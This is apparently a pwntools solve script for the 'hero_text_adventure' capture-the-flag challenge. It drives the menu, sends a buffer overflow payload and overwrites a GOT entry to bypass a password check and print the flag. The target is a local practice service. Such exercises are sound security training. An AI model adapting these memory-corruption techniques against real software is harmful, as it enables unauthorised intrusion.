hero_text_adventure
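# -*- coding: utf-8 -*-
# CTF solve script (pwntools, Python 2 string semantics) for the
# "hero_text_adventure" challenge. It drives the service's text menu with
# a fixed sequence of inputs and prints whatever the service returns after
# the "Enter the password" prompt. Every numeric constant below (menu
# choices, buffer sizes, absolute addresses) is specific to this challenge
# binary; the hard-coded 0x40xxxx/0x60xxxx addresses presumably mean a
# non-PIE build -- TODO confirm against the binary.
import random
from pwn import *

context.update(arch='amd64', os='linux')
p, u = pack, unpack

# 'r' as the first argument selects the remote target; anything else talks
# to a local instance on port 4000.  The remote host/port were left blank
# in the published script and must be filled in before use.
REMOTE = len(sys.argv) >= 2 and sys.argv[1] == 'r'
if REMOTE:
    host = ''
    port = 0
else:
    host = '127.0.0.1'
    port = 4000


def menu(conn, choice):
    """Wait for the main menu (ends with '6) exit') and send *choice* + newline.

    `choice` is sent verbatim as text; the wire bytes are identical to
    `conn.send(choice + '\n')` after the prompt has been consumed.
    """
    conn.recvuntil('6) exit\n')
    conn.send('%s\n' % choice)


s = remote(host, port)
try:
    # Initial prompts: decline the (y/N) question, give a 0x20-byte name,
    # pick option 5 ("Thor") from the hero list.
    s.recvuntil('(y/N)\n')
    s.send('n\n')
    s.recvuntil(':\n')
    s.send('A' * 0x20)
    s.recvuntil('5) Thor\n')
    s.send('5\n')

    # Hidden menu option followed by a numeric value.
    menu(s, '1337')
    s.send('1000000\n')

    # Alternate options 2 (with i) and 3 (with 1) five times.
    for i in range(1, 6):
        menu(s, '2')
        s.send('%d\n' % i)
        menu(s, '3')
        s.send('1\n')

    # Option 4 with a 0x20-byte filler followed by a 32-bit address.
    menu(s, '4')
    payload = 'A' * 0x20 + p32(0x400C8C)
    s.send(payload)

    menu(s, '3')
    s.send('2\n')

    # Option 4 again: 0x24 bytes, a '1', then a longer record ending in a
    # 64-bit pointer.  p32(1) * 6 is byte-identical to six p32(1) fields.
    menu(s, '4')
    s.send('C' * 0x24)
    s.send('1\n')
    payload = (
        'A' * 0x20 +
        'A' * 0x20 +
        p32(1) * 6 +
        p(0x603088 - 0x18)  # strcmp@got
    )
    s.send(payload + '\n')

    menu(s, '4')
    s.recvuntil('to be?\n')
    s.send(p(0x4009F0) + '\n')  # strchr@got.plt

    # Option 5 with the fixed adventure id, then an empty line; the text
    # between "Enter the password" and the next menu prompt is the flag.
    menu(s, '5')
    adventure_id = 7128973612576618926
    s.send('%d\n' % adventure_id)
    s.send('\n')
    s.recvuntil('Enter the password\n')
    flag = s.recvuntil(', what would you like to do?', drop=True)
    print(flag)
finally:
    # Always release the connection, including when a recvuntil times out
    # or the service closes the socket early.
    s.close()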